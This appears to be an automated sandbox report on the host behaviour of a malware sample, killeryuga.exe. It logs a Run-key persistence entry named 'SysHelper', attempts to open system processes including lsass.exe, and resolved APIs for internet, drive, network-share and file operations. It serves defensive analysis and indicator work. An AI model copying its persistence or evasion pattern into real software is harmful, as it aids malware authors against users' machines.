SSDeep: 3:qRFiJ2totWIlXllll:qjyx 		False
...
Host Behavior
File (6)
»
Operation Filename Additional Information Success Count Logfile
Open STD_INPUT_HANDLE - True 2
Fn
Open STD_OUTPUT_HANDLE - True 2
Fn
Open STD_ERROR_HANDLE - True 2
Fn
Registry (2)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run - True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run value_name = SysHelper, data = "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe" --AutoStart, type = REG_EXPAND_SZ True 1
Fn
Process (30)
»
Operation Process Additional Information Success Count Logfile
Enumerate Processes - - True 1
Fn
Open System desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\smss.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\csrss.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\wininit.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\csrss.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\winlogon.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\lsm.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\lsass.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\lsm.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\conhost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\audiodg.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\spoolsv.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\taskhost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\system32\sppsvc.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\userinit.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\explorer.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\system32\dwm.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\adobe\reader 10.0\reader\reader_sl.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\users\5p5nrgjn0js halpmcxz\appdata\local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\users\5p5nrgjn0js halpmcxz\appdata\local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\windows media player\pregnancy-infection-derby.exe desired_access = SYNCHRONIZE False 1
Fn
Module (465)
»
Operation Module Additional Information Success Count Logfile
Load KERNEL32.DLL base_address = 0x75350000 True 1
Fn
Load ADVAPI32.dll base_address = 0x76f50000 True 2
Fn
Load GDI32.dll base_address = 0x76a80000 True 1
Fn
Load ole32.dll base_address = 0x75bd0000 True 2
Fn
Load SHELL32.dll base_address = 0x75e30000 True 2
Fn
Load USER32.dll base_address = 0x75470000 True 2
Fn
Load kernel32.dll base_address = 0x75350000 True 2
Fn
Load RPCRT4.dll base_address = 0x759b0000 True 1
Fn
Load MPR.dll base_address = 0x750d0000 True 1
Fn
Load WININET.dll base_address = 0x75d30000 True 1
Fn
Load WINMM.dll base_address = 0x75090000 True 1
Fn
Load SHLWAPI.dll base_address = 0x77020000 True 1
Fn
Load KERNEL32.dll base_address = 0x75350000 True 1
Fn
Load OLEAUT32.dll base_address = 0x76b50000 True 1
Fn
Load IPHLPAPI.DLL base_address = 0x750f0000 True 1
Fn
Load WS2_32.dll base_address = 0x76b10000 True 1
Fn
Load DNSAPI.dll base_address = 0x75020000 True 1
Fn
Load CRYPT32.dll base_address = 0x751a0000 True 1
Fn
Load msvcr100.dll base_address = 0x74e80000 True 1
Fn
Load Psapi.dll base_address = 0x75460000 True 1
Fn
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x75350000 True 15
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe, size = 260 True 2
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe, size = 1024 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CompareStringA, address_out = 0x75363c5a True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTimeZoneInformation, address_out = 0x7536465a True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlushFileBuffers, address_out = 0x7536469b True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseHandle, address_out = 0x75361410 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateFileA, address_out = 0x753653c6 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLocaleInfoW, address_out = 0x75363c42 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CompareStringW, address_out = 0x75363bca True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnumSystemLocalesA, address_out = 0x7538287b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLocaleInfoA, address_out = 0x7537d5e5 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetUserDefaultLCID, address_out = 0x75363da5 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetDateFormatA, address_out = 0x7538a959 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTimeFormatA, address_out = 0x7538a842 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStringTypeW, address_out = 0x75361946 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStringTypeA, address_out = 0x75388266 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteFileEx, address_out = 0x753e45ef True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FatalAppExitA, address_out = 0x753e4691 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FillConsoleOutputAttribute, address_out = 0x754071e9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleA, address_out = 0x75361245 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetCommMask, address_out = 0x753e7198 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TransmitCommChar, address_out = 0x753e75fe True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = PrepareTape, address_out = 0x753ed232 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcAddress, address_out = 0x75361222 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrlenW, address_out = 0x75361700 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetVolumePathNameA, address_out = 0x753ebeed True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsBadWritePtr, address_out = 0x7538d1ec True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindNextVolumeMountPointA, address_out = 0x753ec189 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GlobalAlloc, address_out = 0x7536588e True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = UnlockFileEx, address_out = 0x7538d594 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleW, address_out = 0x753634b0 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateDirectoryExA, address_out = 0x753d9479 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InterlockedDecrement, address_out = 0x753613f0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteTapemark, address_out = 0x753ed2d2 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetDriveTypeW, address_out = 0x7536418b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetNativeSystemInfo, address_out = 0x753710b5 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsValidLocale, address_out = 0x7537ce46 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GlobalDeleteAtom, address_out = 0x7537cdad True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringW, address_out = 0x753617b9 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringA, address_out = 0x7538bc39 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = MultiByteToWideChar, address_out = 0x7536192e True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteConsoleW, address_out = 0x75387aca True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleOutputCP, address_out = 0x75379b0f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteConsoleA, address_out = 0x753612fc True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetStdHandle, address_out = 0x753e454f True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionAndSpinCount, address_out = 0x75361916 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryA, address_out = 0x753649d7 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InterlockedExchange, address_out = 0x75361462 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeLibrary, address_out = 0x753634c8 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetConsoleCtrlHandler, address_out = 0x75368a09 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStartupInfoW, address_out = 0x75364d40 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = RaiseException, address_out = 0x753658a6 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = RtlUnwind, address_out = 0x7538d1c3 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TerminateProcess, address_out = 0x7537d802 True 3
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcess, address_out = 0x75361809 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = UnhandledExceptionFilter, address_out = 0x7538772f True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetUnhandledExceptionFilter, address_out = 0x753687c9 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsDebuggerPresent, address_out = 0x75364a5d True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapAlloc, address_out = 0x775fe026 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLastError, address_out = 0x753611c0 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapFree, address_out = 0x753614c9 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Sleep, address_out = 0x753610ff True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ExitProcess, address_out = 0x75367a10 True 3
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteFile, address_out = 0x75361282 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStdHandle, address_out = 0x753651b3 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameA, address_out = 0x753614b1 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameW, address_out = 0x75364950 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeEnvironmentStringsW, address_out = 0x753651cb True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetEnvironmentStringsW, address_out = 0x753651e3 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCommandLineW, address_out = 0x75365223 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetHandleCount, address_out = 0x7536cb29 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileType, address_out = 0x75363531 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStartupInfoA, address_out = 0x75360e00 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DeleteCriticalSection, address_out = 0x776045f5 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsGetValue, address_out = 0x753611e0 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsAlloc, address_out = 0x753649ad True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsSetValue, address_out = 0x753614fb True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsFree, address_out = 0x75363587 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InterlockedIncrement, address_out = 0x75361400 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetLastError, address_out = 0x753611a9 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentThreadId, address_out = 0x75361450 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentThread, address_out = 0x753617ec True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapCreate, address_out = 0x75364a2d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapDestroy, address_out = 0x753635b7 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualFree, address_out = 0x7536186e True 3
Fn
Get Address c:\windows\syswow64\kernel32.dll function = QueryPerformanceCounter, address_out = 0x75361725 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTickCount, address_out = 0x7536110c True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessId, address_out = 0x753611f8 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetSystemTimeAsFileTime, address_out = 0x75363509 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetFilePointer, address_out = 0x753617d1 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WideCharToMultiByte, address_out = 0x7536170d True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleCP, address_out = 0x75407bff True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleMode, address_out = 0x75361328 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnterCriticalSection, address_out = 0x775f22b0 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LeaveCriticalSection, address_out = 0x775f2270 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCPInfo, address_out = 0x75365189 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetACP, address_out = 0x7536179c True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetOEMCP, address_out = 0x7538d1a1 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsValidCodePage, address_out = 0x75364493 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualAlloc, address_out = 0x75361856 True 3
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapReAlloc, address_out = 0x77611f6e True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapSize, address_out = 0x77603002 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetEnvironmentVariableA, address_out = 0x7536e331 True 2
Fn
Get Address c:\windows\syswow64\advapi32.dll function = IsValidSecurityDescriptor, address_out = 0x76f5b58c True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = GetFileSecurityA, address_out = 0x76f919b8 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = ImpersonateLoggedOnUser, address_out = 0x76f5c57a True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = ObjectCloseAuditAlarmW, address_out = 0x76f93389 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CreatePrivateObjectSecurity, address_out = 0x76f79a12 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = AreAllAccessesGranted, address_out = 0x76f930a8 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = GetAclInformation, address_out = 0x76f5cc89 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = AreAnyAccessesGranted, address_out = 0x76f930b8 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = SetMetaFileBitsEx, address_out = 0x76aa7121 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = CreateDIBPatternBrushPt, address_out = 0x76aab6da True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = SetWindowExtEx, address_out = 0x76aa1ace True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = GetMetaFileBitsEx, address_out = 0x76aa6e71 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = GetDeviceCaps, address_out = 0x76a94de0 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = AngleArc, address_out = 0x76ac4124 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = GetDCBrushColor, address_out = 0x76ac232e True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = FlattenPath, address_out = 0x76ac555d True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = GetGraphicsMode, address_out = 0x76aa138a True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = SetDIBits, address_out = 0x76a97590 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = CopyEnhMetaFileW, address_out = 0x76acd9dc True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = Chord, address_out = 0x76ac439f True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = PlayMetaFile, address_out = 0x76aab2b9 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = CLSIDFromProgID, address_out = 0x75bf503c True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = OleUninitialize, address_out = 0x75beeba1 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = OleSetMenuDescriptor, address_out = 0x75c2dc53 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = OleLoadFromStream, address_out = 0x75bd6143 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = OleQueryCreateFromData, address_out = 0x75c532d4 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = SHGetPathFromIDListA, address_out = 0x75f51c24 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = ShellExecuteW, address_out = 0x75e43c71 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = SHGetInstanceExplorer, address_out = 0x75e76399 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = Shell_NotifyIconA, address_out = 0x76078af2 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = DragAcceptFiles, address_out = 0x75f51bf1 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = SetWindowsHookW, address_out = 0x754c8ca2 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = PostThreadMessageW, address_out = 0x75488bff True 2
Fn
Get Address c:\windows\syswow64\user32.dll function = SetMessageQueue, address_out = 0x7549c8e7 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetSysColor, address_out = 0x75486c3c True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = BroadcastSystemMessageW, address_out = 0x754cc140 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = EndPaint, address_out = 0x75491341 True 2
Fn
Get Address c:\windows\syswow64\user32.dll function = OpenDesktopA, address_out = 0x7549011a True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = SetCapture, address_out = 0x754aed56 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = MsgWaitForMultipleObjects, address_out = 0x75490b4a True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DefDlgProcW, address_out = 0x77634100 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DdeUnaccessData, address_out = 0x754d82f4 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetClassInfoExW, address_out = 0x7548b238 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetScrollBarInfo, address_out = 0x75493ff8 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = CharLowerA, address_out = 0x75493e75 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsAlloc, address_out = 0x75364f2b True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsGetValue, address_out = 0x75361252 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsSetValue, address_out = 0x75364208 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsFree, address_out = 0x7536359f True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EncodePointer, address_out = 0x77610fcb True 9
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DecodePointer, address_out = 0x77609d35 True 4
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsProcessorFeaturePresent, address_out = 0x75365235 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateToolhelp32Snapshot, address_out = 0x7538735f True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Module32FirstW, address_out = 0x753879f9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualProtect, address_out = 0x7536435f True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetVersionExA, address_out = 0x75363519 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetErrorMode, address_out = 0x75361b00 True 2
Fn
Get Address c:\windows\syswow64\rpcrt4.dll function = RpcStringFreeA, address_out = 0x759f3fc5 True 1
Fn
Get Address c:\windows\syswow64\rpcrt4.dll function = UuidToStringA, address_out = 0x75a2d918 True 1
Fn
Get Address c:\windows\syswow64\rpcrt4.dll function = UuidToStringW, address_out = 0x759f1ee5 True 1
Fn
Get Address c:\windows\syswow64\rpcrt4.dll function = RpcStringFreeW, address_out = 0x759d1635 True 1
Fn
Get Address c:\windows\syswow64\rpcrt4.dll function = UuidCreate, address_out = 0x759cf48b True 1
Fn
Get Address c:\windows\syswow64\mpr.dll function = WNetEnumResourceW, address_out = 0x750d3058 True 1
Fn
Get Address c:\windows\syswow64\mpr.dll function = WNetOpenEnumW, address_out = 0x750d2f06 True 1
Fn
Get Address c:\windows\syswow64\mpr.dll function = WNetCloseEnum, address_out = 0x750d2dd6 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetCloseHandle, address_out = 0x75d4ab49 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetOpenW, address_out = 0x75d59197 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetOpenUrlW, address_out = 0x75dabe5c True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetReadFile, address_out = 0x75d4b406 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = HttpQueryInfoW, address_out = 0x75d55c75 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetOpenUrlA, address_out = 0x75d730f1 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetOpenA, address_out = 0x75d5f18e True 1
Fn
Get Address c:\windows\syswow64\winmm.dll function = timeGetTime, address_out = 0x750926e0 True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathFileExistsW, address_out = 0x770345bf True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathFileExistsA, address_out = 0x7705ad1a True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathRemoveFileSpecW, address_out = 0x77033248 True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathFindFileNameW, address_out = 0x7703bb71 True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathFindExtensionW, address_out = 0x7703a1b9 True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathAppendA, address_out = 0x7702d65e True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathAppendW, address_out = 0x770381ef True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindFirstFileW, address_out = 0x75364435 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrlenA, address_out = 0x75365a4b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateProcessW, address_out = 0x7536103d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetFilePointerEx, address_out = 0x7537c807 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateDirectoryW, address_out = 0x75364259 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WaitForSingleObject, address_out = 0x75361136 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLogicalDrives, address_out = 0x75365371 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetDriveTypeA, address_out = 0x7537ef75 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = OpenProcess, address_out = 0x75361986 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetSystemDirectoryW, address_out = 0x75365063 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryW, address_out = 0x7536492b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CopyFileW, address_out = 0x7538830d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FormatMessageW, address_out = 0x75364620 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcpynW, address_out = 0x7538d556 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateProcessA, address_out = 0x75361072 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ReadFile, address_out = 0x75363ed3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateFileW, address_out = 0x75363f5c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcatA, address_out = 0x75382b7a True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetEnvironmentVariableA, address_out = 0x753633a0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcmpW, address_out = 0x75365929 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetShortPathNameA, address_out = 0x7538594d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileSizeEx, address_out = 0x753659e2 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = MoveFileW, address_out = 0x75379af0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Process32FirstW, address_out = 0x75388baf True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LocalAlloc, address_out = 0x7536168c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateEventW, address_out = 0x7536183e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Process32NextW, address_out = 0x7538896c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcatW, address_out = 0x7538828e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateMutexA, address_out = 0x75364c6b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DeleteFileW, address_out = 0x753689b3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LocalFree, address_out = 0x75362d3c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcpyW, address_out = 0x75383102 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DeleteFileA, address_out = 0x75365444 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcpyA, address_out = 0x75382a9d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetPriorityClass, address_out = 0x7537cf28 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetExitCodeProcess, address_out = 0x7537174d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GlobalFree, address_out = 0x75365558 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetVersion, address_out = 0x75364467 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateThread, address_out = 0x753634d5 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateDirectoryA, address_out = 0x7538d526 True 1
Fn
